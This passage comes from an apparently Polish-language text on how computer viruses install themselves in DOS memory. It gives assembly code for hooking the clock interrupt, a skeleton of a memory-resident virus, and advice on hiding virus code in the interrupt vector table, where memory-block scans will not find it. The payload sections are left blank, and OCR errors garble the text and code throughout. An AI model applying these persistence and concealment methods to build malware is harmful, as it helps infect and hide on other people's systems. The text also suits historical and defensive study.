COM A000:0000 Pamiêæ karty EGA/YGA €800:0000 Rozszerzenia BIOS F600:0000 Interpreter BASIC-a FEOO:0000 do FFFF:FFFF ROM-BIOS Z tabeli tej wynika i¿...

W systemie operacyjnym DOS kluczow¹ rolê odgrywa system przerwañ, bowiem dostêp do funkcji systemowej uzyskujemy przez wywo³anie odpowiedniego przerwania, dlatego te¿ g³ównym punktem 67 instalacji wirusa w systemie jest w³aœnie przejêcie przerwania. Poni¿ej zamieszczam sposób przejêcia przerwania 08h. Instalacja_w_systemie PROC mov ax,3508h int 21h ;odczytaj adres procedury obs³ugi przerwania 8h (zegarowe) mov int08o,bx mov int08s,es push es pop ds mov dx,offset obsluga_przerwania8h mov ax,2508h ;ustaw nowy adres procedury obs³ugi przerwania 8h int 21h ret Instalacja_w_systemie ENDP intOSo dwO intOSs dwO obsluga_przerwania8h PROC pushf cali dword ptr es: [intOSo] ;Wykonaj star¹ obs³ugê przerwania 8h [...] ;Kod wirusa iret obsluga_przerwania8h ENDP W powy¿szym przyk³adzie korzystaliœmy z dwóch funkcji systemowych 35h oraz 25h pobieraj¹cych i zmieniaj¹cych adres obs³ugi przerwania 8h. Istnieje równie¿ drugi sposób przejêcia przerwania - poprzez ingerencje bezpoœrednio w tablicê wektorów przerwañ. Tablica ta sk³ada siê z 256-ciu 4-bajtowych adresów. Adresy te pamiêtane s¹ w kolejnoœci offset, segment. Poprzez zmianê tych wektorów mamy mo¿liwoœæ instalowania w systemie w³asnych procedur obs³ugi przerwañ. Poni¿szy przyk³ad zobrazuje ten sposób przejmowania: Instalacja_w_systemie PROC mov ax,0 mov es,ax cli mov di,4*8h mov ax,es:[di] ;ES:DI - adres miejsca w tablicy wektorów przerwañ z adresem ;procedury obs³ugi przerwania 8h. mov int08o,ax mov ax,es:[di+2] mov int08s,ax ;Odczytaj stary adres obs³ugi przerwania mov ax,offset obsluga_przerwania8h stosw mov ax,seg obsluga_przerwania8h stosw ;Zmieñ adres obs³ugi przerwania 8h sti ret Instalacja_w_systemie ENDP intOSo dwO intOSs dwO 68 obsluga_przerwania8h PROC pushf cali dword ptr es: [intOSo] ;Wykonaj star¹ obs³ugê przerwania 8h [...] ;Kod wirusa iret obsluga_przerwania8h ENDP Po przejêciu odpowiedniego przerwania (podpiêciu siê pod funkcje systemowe) wirus musi staæ siê rezydentny. Jego kod musi zatem pozostaæ w pamiêci. Innymi s³owy wirus staje siê programem typu TSR (Terminate & Stay Resident). Dzia³anie takich programów sk³ada siê z trzech czêœci. 1) Uruchomienie w³aœciwego programu, który koñczy dzia³anie pozostaj¹c w pamiêci 2) Sprawdzenie, czy zosta³ spe³niony warunek jego wywo³ania (np. odpowiednia kombinacja klawiszy). 3) Czêœæ w³aœciwa, wykonuj¹ca ró¿ne czynnoœci us³ugowe. Oto przyk³ad wirusa - TSR-a .MODEL TINY .CODE org lOOh start: jmp Install intOSo dwO intOSs dwO obsluga_przerwania8h PROC pushf cali dword ptr es: [intOSo] ;Wykonaj star¹ obs³ugê przerwania 8h [... ] ; Sprawdzenie warunków [... ] ;W³aœciwy kod wirusa iret obsluga_przerwania8h ENDP Install: [...] ;SprawdŸ czy jest ju¿ wirus w pamiêci mov ax,3508h int 21h ;odczytaj adres procedury obs³ugi przerwania 8h (zegarowe) mov int08o,bx mov int08s,es push es pop ds mov dx,offset obsluga_przerwania8h mov ax,2508h ;ustaw nowy adres procedury obs³ugi przerwania 8h int 21h mov dx,offset Install int 27h ;Zakoñcz proces zostawiaj¹c wszystko w pamiêci przed etykiet¹ Install (Terminate & Stay Resident) END start Po takiej instalacji w systemie operacyjnym kod wirusa bêdzie mo¿na bardzo ³atwo wykryæ, gdy¿ ka¿dy proces istniej¹cy w systemie dysponuje przydzielonym mu przez system obszarem pamiêci operacyjnej. Ka¿dy blok pamiêci jest identyfikowany przez specjaln¹ strukturê danych, tzw. nag³ówek bloku pamiêci 69 (nazywany te¿ blokiem MCB od ang. memory control b³ock). Bloki pamiêci tworz¹ ³añcuch pokrywaj¹cy ca³¹ pamiêæ operacyjn¹ dostêpn¹ dla u¿ytkownika. Nie jest to struktura listowa - po³o¿enie nastêpnego bloku okreœla d³ugoœæ bloku bie¿¹cego Format nag³ówka bloku pamiêci (MCB) Adres pola D³ugoœæ pola Zawartoœæ OOH 1 Znacznik typu bloku: 4Dh - dla bloku poœredniego 5 Ah - dla bloku koñcowego 01H 2 Identyfikator procesu (PID) bêd¹cego "w³aœcicielem" bloku pamiêci, tzn. wskaŸnik do bloku wstêpnego programu (PSP); wskaŸnik jest pusty w przypadku bloku wolnego 03H 2 D³ugoœæ bloku w jednostkach 16-bajtowych (bez nag³ówka) 05H 3 Zarezerwowane Poprzez analizê ³añcucha MCB jesteœmy w stanie namierzyæ ka¿dy proces, który jest TSR-em. Wirus mo¿e staæ siê rezydentem wykorzystuj¹c puste miejsca systemowe. Jednym z nich jest tablica wektorów przerwañ. Wiêkszoœæ przerwañ nie jest u¿ywana przez system operacyjny - skoro tak - to nic nie stoi na przeszkodzie aby wykorzystaæ przestrzeñ adresow¹ przeznaczon¹ na wektory do nieu¿ywanych przerwañ do innych celów (miejsca na segment danych wirusa lub tez na segment kodu wirusa). W miarê bezpiecznym obszarem jest obszar od adresu 0000:01EO (to jest adresu, w którym pamiêtany jest wektor przerwania 78h) do adresu 0000:0400 (koniec tablicy wektorów przerwañ). Daje nam to obszar 544 bajtów do wykorzystania na kod wirusa. tryb chroniony W punkcie tym postaramy siê przedstawiæ metody instalacji wirusa w pamiêci operacyjnej systemu Windows 9x.W tym celu musimy zapoznaæ siê z mechanizmami obs³ugi pamiêci systemu Windows 9x. System ten dysponuje szeœcioma ró¿nymi mechanizmami zarz¹dzania pamiêci¹ aplikacji 32bitowej. Wszystkie one zosta³y zaprojektowane tak, aby mog³y byæ u¿ywane niezale¿nie. Wybór mechanizmu obs³ugi pamiêci dla procesu zale¿y od tego, do jakich celów bêdziemy u¿ywali zaalokowan¹ pamiêæ. Na poni¿szym rysunku przedstawione zosta³y wspomniane mechanizmy